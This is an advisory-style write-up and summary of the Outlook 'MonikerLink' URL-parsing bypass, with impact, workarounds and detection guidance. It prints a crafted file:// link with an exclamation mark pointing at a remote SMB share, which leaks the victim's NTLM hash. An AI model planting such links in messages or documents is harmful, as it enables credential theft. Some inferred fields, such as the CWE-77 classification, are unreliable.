Full Report
Outlook is the most popular email client in the world with all of the other Microsoft Office Suite of products being equally important. Finding vulnerabilities in this can have devastating consequences. Everyone knows what URLs are - http, https, etc.. However, there are many other URLs for other apps, such as Skype. The file:// URL can be used to reference local files on the system. By default, this is blocked from execution on Word when clicked on. Some researchers found a weird bypass for this check. If the path has an exclamation point then some text afterwards then the check is bypassed. For example - file:///\\10.10.111.111\test\test.rtf!something. The exclamation point has some special meaning in Outlook that changes the meaning of the parsing from a file to a Moniker to try to find COM objects. What's the impact of this? First, a request to a file at a remote location would leak the NTLM hash. Second, since this tries to parse the item as a COM object, it may be possible to escalate this to RCE. However, there is no real example of this and it feels like scare tactic. A fairly simple mishap on the parsing of the URL. When deep knowledge of a system comes obvious bugs.
Analysis Summary
# Vulnerability: Outlook URL Parsing Bypass via Exclamation Mark Leading to File Access/Credential Leak
## CVE Details
- CVE ID: Not specified in the provided text.
- CVSS Score: Not specified in the provided text.
- CWE: (Inferred) CWE-77: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') or related URL parsing weakness.
## Affected Systems
- Products: Microsoft Outlook. Also potentially other software that handles URL parsing similarly.
- Versions: Not specified in the provided text. The vulnerability exists in default desktop Outlook configurations where `file://` URLs are typically blocked from remote access.
- Configurations: Occurs when clicking on specially crafted hyperlinks inside Outlook emails.
## Vulnerability Description
This vulnerability resides in how Microsoft Outlook parses certain `file://` URLs. By default, clicking a `file://` link pointing to a remote resource (e.g., a file share) is blocked or triggers a warning, preventing credential leakage via SMB. However, if the URL path includes an exclamation mark (`!`) followed by any text (e.g., `file:///\\10.10.111.111\test\test.rtf!something`), this special character bypasses the security check designed to block remote file access. This bypass causes Outlook's parser to interpret the URI differently, potentially treating the path as a Moniker necessary for finding COM objects, which unexpectedly allows access to the specified remote resource.
## Exploitation
- Status: PoC available (The description details the creation of the malicious link).
- Complexity: Low (Requires crafting a specific URL format in an email).
- Attack Vector: Network (Delivered via email, triggers remote connection/access upon clicking).
## Impact
- Confidentiality: High (Successful access to a remote file path leaks the user's NTLM hash when the SMB connection is initiated).
- Integrity: Potential (The mechanism relies on parsing as a COM object, which raises the *possibility* of exploitation leading to Remote Code Execution (RCE), though the article notes this RCE aspect is speculative or unproven in this context).
- Availability: Low/Negligible (Direct impact not clearly described, likely linked to potential RCE if realized).
## Remediation
### Patches
- No specific patch details or version numbers were provided in the analysis summary. Users must consult official Microsoft security bulletins for updates related to URL handling in Outlook.
### Workarounds
- Disabling the viewing of embedded HTML content or avoiding clicking on suspicious links, especially those containing `file://` protocols alongside exclamation marks.
- Security monitoring for outbound SMB/NetNTLM traffic initiated by Outlook processes.
## Detection
- **Indicators of compromise:** Outbound network connections initiated by the Outlook process (or related components) to remote IP addresses over protocols like SMB/Port 445, especially immediately following a user clicking a hyperlink.
- **Detection methods and tools:** Network monitoring tools configured to alert on unexpected SMB authentication negotiation attempts originating from user workstations directed at external or untrusted internal hosts.
## References
- Vendor advisories: Not specified in the summary, but research originates from Check Point Research (CPR).
- Relevant links - defanged:
* `hXXps://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/`
* Reference to prior research paper: `hXXps://research.checkpoint.com/2023/the-obvious-the-normal-and-the-advanced-a-comprehensive-analysis-of-outlook-attack-vectors/`